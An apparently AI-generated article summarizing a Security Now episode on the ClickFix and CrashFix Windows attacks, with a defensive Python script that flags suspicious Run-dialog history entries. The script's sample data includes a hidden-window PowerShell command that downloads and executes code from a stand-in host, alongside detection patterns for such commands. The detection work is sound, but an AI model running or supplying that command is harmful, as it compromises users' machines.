
How the Latest "ClickFix" Exploit Targets Windows Users

AI-generated, human-reviewed.

A new exploit called "ClickFix," further weaponized by a threat actor dubbed Kong Tuk, is actively targeting Windows users by tricking them into running malicious commands. According to Security Now hosts Steve Gibson and Leo Laporte, this attack leverages fake browser crash dialogs and social engineering to bypass traditional protections—and Microsoft urgently needs to address this vulnerability.

What is the ClickFix Exploit?

The ClickFix exploit is a rapidly evolving malware-delivery technique that manipulates Windows users into pasting harmful commands from their clipboard directly into the Windows Run dialog. It is usually delivered through a web browser pop-up disguised as a security or troubleshooting prompt, which asks users to prove they are human or to fix their browser.

Kong Tuk, a threat actor tracked by Huntress Labs, has taken this attack further with a new variant called "CrashFix." In this iteration, victims see a convincing Microsoft Edge crash dialog. They're told to run a scan—by pressing Win+R, pasting from the clipboard, and hitting Enter. What’s actually pasted is a malicious PowerShell command, effectively giving attackers complete access to the machine.

Unlike typical phishing, this attack doesn’t rely on downloading files or clicking suspicious links. It turns the browser’s clipboard and Windows’ own built-in features against the user.

Why Is This Exploit So Dangerous?

  • Highly convincing prompts: The pop-ups mimic legitimate Microsoft dialogs so well that even savvy users may be fooled.
  • Minimal defense from antivirus solutions: Since the attack leverages user actions and legitimate Windows functionality, traditional antivirus software often doesn’t detect or block it.
  • No technical knowledge required for the victim: Users simply follow instructions, making it dangerous for anyone, regardless of experience level.

On Security Now, Steve Gibson highlighted that the underlying issue is the power and complexity of Windows, combined with users’ tendency to follow instructions without understanding the risks. Attackers are now able to bypass most technical defenses by exploiting human behavior.

What Should Microsoft and Users Do?

According to Steve Gibson, the only practical fix is for Microsoft to build protections directly into Windows. He recommends:

  • Clipboard quarantine measures: Windows should flag clipboard content sourced from web browsers and alert users before allowing it to be executed.
  • Enhanced user prompts: Mark risky operations (like running PowerShell commands pasted from the clipboard) with clear warnings, similar to how downloaded files are flagged with the Mark of the Web.
  • User education: While technical fixes are critical, ongoing education about social engineering tactics is essential.

Third-party utilities to address this would have limited impact, since the users most at risk rarely know about them, let alone install them. Only the operating system itself can meaningfully protect everyone.
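Until Windows carries such safeguards, defenders can at least hunt for the trace this attack leaves behind: whatever a user executes through Win+R is recorded, newest first, under the Run-dialog history key HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. The Python below is an added example, not code from the episode or the article; it scores a constructed set of RunMRU entries (the command string and its URL are made up) with heuristics for hidden-window, encoded, download-and-execute launches of the kind a ClickFix lure pastes. On a live Windows host the same dictionary can be filled by enumerating that key with the standard winreg module.

```python
import re
from dataclasses import dataclass

# Constructed sample of the RunMRU key (value name -> data). Windows stores each
# Run-dialog entry with a trailing "\1"; the MRUList value orders them newest first.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": 'powershell -w hidden -c "iex (irm http://example.invalid/verify)"\\1',
}

# Programs a ClickFix-style lure typically tells the victim to launch via Win+R.
LAUNCHERS = re.compile(r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|curl|certutil)\b", re.I)
# Traits that separate a pasted lure command from ordinary Run-dialog use.
INDICATORS = [
    (re.compile(r"-(w|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(e|enc|encodedcommand)\b", re.I), "encoded command"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "in-memory execution"),
    (re.compile(r"\b(irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b", re.I), "remote download"),
    (re.compile(r"https?://", re.I), "URL in command"),
    (re.compile(r"captcha|verify|human|fix", re.I), "lure keyword"),
]

@dataclass
class Finding:
    name: str           # RunMRU value name
    command: str        # what was typed or pasted into the Run dialog
    reasons: list[str]  # which indicators matched

def analyze_runmru(values: dict[str, str]) -> list[Finding]:
    """Return suspicious Run-dialog entries, most recent first."""
    findings = []
    for name in values.get("MRUList", ""):   # one character per entry, newest first
        raw = values.get(name)
        if raw is None:
            continue
        command = raw.removesuffix("\\1")
        if not LAUNCHERS.search(command):    # not a launcher: e.g. "notepad", a UNC path
            continue
        reasons = [label for rx, label in INDICATORS if rx.search(command)]
        if len(reasons) >= 2:                # a lone "cmd" is normal; two or more traits is not
            findings.append(Finding(name, command, reasons))
    return findings

if __name__ == "__main__":
    for f in analyze_runmru(SAMPLE_RUNMRU):
        print(f"{f.name}: {f.command}\n    {', '.join(f.reasons)}")
```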

Key Takeaways

  • ClickFix and CrashFix exploit Windows user behavior, not software flaws
  • Threat actor Kong Tuk uses cloned browser extensions and fake dialogs to trick users
  • Malicious PowerShell commands are delivered through clipboard instructions
  • Antivirus software often fails to detect these attacks
  • Microsoft needs to implement clipboard and command execution safeguards
  • Users should be skeptical of browser dialogs that ask them to run commands or paste contents into the Run dialog
  • Education and built-in OS protections are the only scalable solutions

The Bottom Line

Security Now episode 1067 makes one thing clear: as social engineering attacks become more sophisticated, relying on traditional antivirus and careful browsing is no longer enough. Windows users are especially vulnerable to attacks like ClickFix and Kong Tuk’s CrashFix. Staying safe requires skepticism toward unexpected prompts—especially those that instruct you to paste or run commands. Most importantly, operating system vendors must proactively build protections to stop these exploits before they spread further.

Source: Security Now episode 1067
https://twit.tv/shows/security-now/episodes/1067
